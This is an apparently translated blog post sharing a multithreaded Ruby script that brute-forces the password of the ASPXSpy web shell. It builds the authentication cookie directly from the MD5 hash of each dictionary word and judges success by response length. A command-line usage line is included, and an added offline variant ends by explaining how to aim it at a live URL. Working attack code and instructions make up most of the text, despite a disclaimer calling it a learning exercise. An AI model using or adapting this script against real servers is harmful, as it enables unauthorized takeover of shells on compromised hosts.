After reading part of the ASPXSpy logon code, it turns out you do not need to pull the username and password field names out of the form to attack it. When ASPXSpy processes a logon it sets a cookie after a successful login, so that cookie can simply be constructed. In this code I hash each password from the dictionary with MD5, put the resulting hex string into the headers of the HTTP object as the current Cookie, and submit the request with that cookie over HTTP. I then compare the content of the returned page to decide whether the logon succeeded. For efficiency I added multithreading support.
Unfortunately Ruby's threads are not native OS threads: MRI 1.8 simulates multiple threads inside a single process (green threads), and later MRI versions still serialize Ruby code under the GVL, so they cannot fully use multiple CPU cores. For network-bound work like this they still overlap the waits on HTTP responses, which is where the time goes.
Usage of this program:
ruby xx.rb http://www.xxx.com/aspxspy.aspx <number of threads>
# Please credit the source when reposting this article
# This code is only an exercise from learning the Ruby language. Do not use it for attacks; the consequences are your own responsibility.
require 'net/http'
require 'uri'
require 'digest/md5'   # the old 'md5' library was removed in Ruby 1.9; Digest::MD5 works on 1.8 and later

# Load the password dictionary (one candidate per line) into the global $pass array
def read_dict
  f = File.new("pass.txt")
  f.each do |line|
    $pass << line.chomp
  end
  f.close
end

abort "usage: #$0 <website> <threads>" if $*[0] == nil || $*[1] == nil
thread_number = $*[1].to_i
url = URI.parse($*[0])
puts "[Target] #{url.host}:#{url.port}"
puts "[Path] #{url.path}"
puts "[*] start crack aspxspy login password"
$pass = []
read_dict
threads = []

# Work through the dictionary thread_number passwords at a time: one thread per
# password in the slice, then join the whole slice before starting the next one
$pass.each_slice(thread_number) do |pass_sub|
  pass_sub.each do |p|
    threads << Thread.new(p) do |tp|
      # sleep(rand(0.1))
      begin
        http = Net::HTTP.new(url.host, url.port)
      rescue
        puts "[-] http error, #{$!}"
        Thread.exit
      end
      puts "[*] cracking [" + tp.chomp + "] => " + Digest::MD5.hexdigest(tp.chomp)
      # ASPXSpy recognises a logged-in session by a cookie holding the MD5 of the
      # password, so the cookie is built directly instead of posting the logon form
      headers = {
        'Cookie' => 'ASPXSpy=' + Digest::MD5.hexdigest(tp.chomp)
      }
      begin
        resp = http.get(url.path, headers)
        data = resp.body
        # puts data
        # next if data.length < 4000
      rescue
        puts "[-] http response err, #{$!}"
        Thread.exit
      end
      # The logon form is small; a page longer than 4000 bytes means the shell itself came back
      (puts "[*] Success! Current pass is #{tp.chomp}"; exit) if data.length > 4000
    end
  end
  threads.each { |te| te.join }
  threads.clear
end
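The same idea, cookie construction plus a page-length check, as an added example that runs offline and is not the script from this post. The network call is factored out into a callable so the cracking loop can be exercised against `fake_aspxspy`, a constructed stand-in for the shell (an assumption for testing, not ASPXSpy's code) that returns a large page when the cookie carries the MD5 of the right password and the short logon form otherwise; the 4000-byte threshold is the heuristic from the post, and the sample dictionary is made up.

```ruby
require 'digest/md5'
require 'thread'

# Build the cookie ASPXSpy expects for an already-authenticated session: the value
# is just the MD5 hex digest of the password, so no form field names are needed
def aspxspy_cookie(password)
  "ASPXSpy=#{Digest::MD5.hexdigest(password)}"
end

# The post's success heuristic: the logon form is short, the shell page is long
LOGIN_PAGE_LIMIT = 4000
def logged_in?(body)
  body.length > LOGIN_PAGE_LIMIT
end

# Constructed stand-in for the target (assumption: not ASPXSpy itself) so the loop
# can run offline. It answers the way the real shell does on a cookie hit: a page
# well over 4000 bytes when the MD5 in the cookie matches, the small logon form otherwise.
def fake_aspxspy(secret)
  expected = aspxspy_cookie(secret)
  lambda do |headers|
    if headers['Cookie'] == expected
      '<html>' + ('<a href="#">' * 600) + '</html>'          # 7200+ bytes, like the shell's main page
    else
      '<html><form><input name="Password"/></form></html>'   # the logon form
    end
  end
end

# Try every dictionary word, thread_number at a time, and return the first password
# whose constructed cookie is accepted (nil if none). fetch is any callable that takes
# a headers hash and returns the response body, so a real Net::HTTP call fits too.
def crack(dictionary, thread_number, fetch)
  found = nil
  lock = Mutex.new
  dictionary.each_slice(thread_number) do |slice|
    threads = slice.map do |pw|
      Thread.new(pw) do |tp|
        body = fetch.call('Cookie' => aspxspy_cookie(tp))
        lock.synchronize { found ||= tp } if logged_in?(body)
      end
    end
    threads.each(&:join)   # finish this slice before starting the next
    break if found
  end
  found
end

if __FILE__ == $0
  dict = %w[123456 password admin aspxspy letmein]   # constructed sample dictionary
  puts crack(dict, 2, fake_aspxspy('admin')).inspect
end
```

Against a live target, `fetch` would be something like `lambda { |h| Net::HTTP.new(url.host, url.port).get(url.path, h).body }`. The length check is deliberately crude: a customised logon page, an error page or a WAF block page can all cross the 4000-byte line, so in practice it is worth confirming a hit by looking for a string that only the authenticated shell page contains.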